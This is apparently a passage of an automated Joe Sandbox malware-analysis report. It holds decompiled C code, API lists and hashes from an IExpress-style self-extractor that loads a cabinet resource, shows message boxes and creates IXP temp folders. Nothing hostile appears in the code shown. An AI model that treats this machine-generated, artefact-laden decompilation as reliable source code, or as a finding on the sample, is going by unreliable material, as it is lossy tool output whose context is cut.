                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0x3291d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E003244B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0x328a38 & 0x00000001) == 0 && ( *0x329a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0x328584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00324FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00325006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0032500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00325030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00325037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 0032504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00325051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00325111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00325159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: 7f6ade2d9d7eee039643b1d34de7e8cb812712be670611c99dd64070ab2aa573
                                                                                                                                                                                                                                            • Instruction ID: ee410e7499f1188566c289147d8ade89192a0eb16fcc65c12cb5c0e75be7d07b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f6ade2d9d7eee039643b1d34de7e8cb812712be670611c99dd64070ab2aa573
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA3109B0740735BFEB335B62BD8AF67369CB704B55F05441DFD01A21E1DAB4AC528A60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 3244b9-3244f8 407 324679-32467b 406->407 408 3244fe-324525 LoadStringA 406->408 411 32467c-32468c call 326ce0 407->411 409 324562-324568 408->409 410 324527-32452e call 32681f 408->410 412 32456b-324570 409->412 420 324530-32453d call 3267c9 410->420 421 32453f 410->421 412->412 415 324572-32457c 412->415 418 3245c9-3245cb 415->418 419 32457e-324580 415->419 424 324607-324617 LocalAlloc 418->424 425 3245cd-3245cf 418->425 422 324583-324588 419->422 420->421 426 324544-324554 MessageBoxA 420->426 421->426 422->422 429 32458a-32458c 422->429 427 32455a-32455d 424->427 428 32461d-324628 call 321680 424->428 431 3245d2-3245d7 425->431 426->427 427->411 435 32462d-32463d MessageBeep call 32681f 428->435 433 32458f-324594 429->433 431->431 434 3245d9-3245ed LocalAlloc 431->434 433->433 436 324596-3245ad LocalAlloc 433->436 434->427 437 3245f3-324605 call 32171e 434->437 444 32464e 435->444 445 32463f-32464c call 3267c9 435->445 436->427 439 3245af-3245c7 call 32171e 436->439 437->435 439->435 448 324653-324677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E003244B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0x328a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x329a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00321680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E0032171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E0032171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E0032681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E003267C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E0032681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E003267C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00324583
                                                                                                                                                                                                                                            0x00324583
                                                                                                                                                                                                                                            0x00324585
                                                                                                                                                                                                                                            0x00324586
                                                                                                                                                                                                                                            0x0032458a
                                                                                                                                                                                                                                            0x0032458c
                                                                                                                                                                                                                                            0x0032458f
                                                                                                                                                                                                                                            0x0032458f
                                                                                                                                                                                                                                            0x00324591
                                                                                                                                                                                                                                            0x00324592
                                                                                                                                                                                                                                            0x0032459b
                                                                                                                                                                                                                                            0x0032459e
                                                                                                                                                                                                                                            0x003245a3
                                                                                                                                                                                                                                            0x003245a9
                                                                                                                                                                                                                                            0x003245ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003245af
                                                                                                                                                                                                                                            0x003245af
                                                                                                                                                                                                                                            0x003245bf
                                                                                                                                                                                                                                            0x0032462d
                                                                                                                                                                                                                                            0x00324630
                                                                                                                                                                                                                                            0x0032463d
                                                                                                                                                                                                                                            0x0032464e
                                                                                                                                                                                                                                            0x0032464e
                                                                                                                                                                                                                                            0x0032463f
                                                                                                                                                                                                                                            0x00324640
                                                                                                                                                                                                                                            0x00324647
                                                                                                                                                                                                                                            0x0032464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032464c
                                                                                                                                                                                                                                            0x00324666
                                                                                                                                                                                                                                            0x0032466d
                                                                                                                                                                                                                                            0x0032466f
                                                                                                                                                                                                                                            0x00324675
                                                                                                                                                                                                                                            0x00324675
                                                                                                                                                                                                                                            0x003245ad
                                                                                                                                                                                                                                            0x00324527
                                                                                                                                                                                                                                            0x0032452e
                                                                                                                                                                                                                                            0x0032453f
                                                                                                                                                                                                                                            0x0032453f
                                                                                                                                                                                                                                            0x00324530
                                                                                                                                                                                                                                            0x00324531
                                                                                                                                                                                                                                            0x00324538
                                                                                                                                                                                                                                            0x0032453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032453d
                                                                                                                                                                                                                                            0x00324554
                                                                                                                                                                                                                                            0x0032455a
                                                                                                                                                                                                                                            0x0032455a
                                                                                                                                                                                                                                            0x0032455a
                                                                                                                                                                                                                                            0x00324525
                                                                                                                                                                                                                                            0x0032468c

APIs
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
• MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 003245A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 003245E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 0032460D
• MessageBeep.USER32(00000000), ref: 00324630
• MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00324666
• LocalFree.KERNEL32(00000000), ref: 0032466F
  • Part of subcall function 0032681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0032686E
  • Part of subcall function 0032681F: GetSystemMetrics.USER32(0000004A), ref: 003268A7
  • Part of subcall function 0032681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003268CC
  • Part of subcall function 0032681F: RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,?,0000000C), ref: 003268F4
  • Part of subcall function 0032681F: RegCloseKey.ADVAPI32(?), ref: 00326902
Strings
Memory Dump Source
• Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
Similarity
• API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
• String ID: LoadString() Error. Could not load string resource.$cent
• API String ID: 3244514340-2605220145
• Opcode ID: 393d06040021427250f94c9209d9c08ac61022768ebdccb2881967c5dc3d7c88
• Instruction ID: 9edb80bbdf1dddbd9859834758b004b518a32e3d601b83d32bc4c19556c3cb8c
• Opcode Fuzzy Hash: 393d06040021427250f94c9209d9c08ac61022768ebdccb2881967c5dc3d7c88
• Instruction Fuzzy Hash: 9A512871900225AFDB239F28EC48BAA7B69EF46300F114199FD49A7241DB71DD0ACB50
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E003253A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E0032171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E00321680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E0032658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E00326CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0x328a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032171E: _vsnprintf.MSVCRT ref: 00321750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003253FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-4044985724
                                                                                                                                                                                                                                            • Opcode ID: d15256fd5172a764b7ce0f81a653c2d62f3e3c641e2fd0a092bb2f93b367c6c3
                                                                                                                                                                                                                                            • Instruction ID: 1d2b55f8f7c8797c26c67bd9667df758dc5e8124308ce1c6d20ba6623aebf68f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d15256fd5172a764b7ce0f81a653c2d62f3e3c641e2fd0a092bb2f93b367c6c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC11017130092477D322AB26BC49FEF766DEFD2721F104129F646D2190CEB48A8786A2
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 522 325467-325484 523 32548a-325490 call 3253a1 522->523 524 32551c-325528 call 321680 522->524 527 325495-325497 523->527 528 32552d-325539 call 3258c8 524->528 529 325581-325583 527->529 530 32549d-3254c0 call 321781 527->530 537 32553b-325545 CreateDirectoryA 528->537 538 32554d-325552 528->538 532 32558d-32559d call 326ce0 529->532 541 3254c2-3254d8 GetSystemInfo 530->541 542 32550c-32551a call 32658a 530->542 544 325577-32557c call 326285 537->544 545 325547 537->545 539 325554-325557 call 32597d 538->539 540 325585-32558b 538->540 551 32555c-32555e 539->551 540->532 549 3254da-3254dd 541->549 550 3254fe 541->550 542->528 544->529 545->538 555 3254f7-3254fc 549->555 556 3254df-3254e2 549->556 552 325503-325507 call 32658a 550->552 551->540 557 325560-325566 551->557 552->542 555->552 559 3254f0-3254f5 556->559 560 3254e4-3254e7 556->560 557->529 561 325568-325575 RemoveDirectoryA 557->561 559->552 560->542 562 3254e9-3254ee 560->562 561->529 562->552
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00325467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
    void* _t20;
    signed int _t26;
    void* _t28;
    void* _t29;
    CHAR* _t48;
    signed int _t49;
    intOrPtr _t61;

    _t10 =  *0x328004; // 0x2c4b51c8
    _v8 = _t10 ^ _t49;
    _push(__ecx);
    if(__edx == 0) {
        _t48 = 0x3291e4;
        _t42 = 0x104;
        E00321680(0x3291e4, 0x104);
        L14:
        _t13 = E003258C8(_t48); // executed
        if(_t13 != 0) {
            L17:
            _t42 = _a4;
            if(_a4 == 0) {
                L23:
                 *0x329124 = 0;
                _t14 = 1;
                L24:
                return E00326CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
            }
            _t16 = E0032597D(_t48, _t42, 1, 0); // executed
            if(_t16 != 0) {
                goto L23;
            }
            _t61 =  *0x328a20; // 0x0
            if(_t61 != 0) {
                 *0x328a20 = 0;
                RemoveDirectoryA(_t48);
            }
            L22:
            _t14 = 0;
            goto L24;
        }
        if(CreateDirectoryA(_t48, 0) == 0) {
             *0x329124 = E00326285();
            goto L22;
        }
         *0x328a20 = 1;
        goto L17;
    }
    _t42 =  &_v268;
    _t20 = E003253A1(__ecx,  &_v268); // executed
    if(_t20 == 0) {
        goto L22;
    }
    _push(__ecx);
    _t48 = 0x3291e4;
    E00321781(0x3291e4, 0x104, __ecx,  &_v268);
    if(( *0x329a34 & 0x00000020) == 0) {
        L12:
        _t42 = 0x104;
        E0032658A(_t48, 0x104, 0x321140);
        goto L14;
    }
    GetSystemInfo( &_v304);
    _t26 = _v304.dwOemId & 0x0000ffff;
    if(_t26 == 0) {
        _push("i386");
        L11:
        E0032658A(_t48, 0x104);
        goto L12;
    }
    _t28 = _t26 - 1;
    if(_t28 == 0) {
        _push("mips");
        goto L11;
    }
    _t29 = _t28 - 1;
    if(_t29 == 0) {
        _push("alpha");
        goto L11;
    }
    if(_t29 != 1) {
        goto L12;
    }
    _push("ppc");
    goto L11;
}
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325507
                                                                                                                                                                                                                                            0x003254da
                                                                                                                                                                                                                                            0x003254dd
                                                                                                                                                                                                                                            0x003254f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003254f7
                                                                                                                                                                                                                                            0x003254df
                                                                                                                                                                                                                                            0x003254e2
                                                                                                                                                                                                                                            0x003254f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003254f0
                                                                                                                                                                                                                                            0x003254e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003254e9
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003254C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032553D
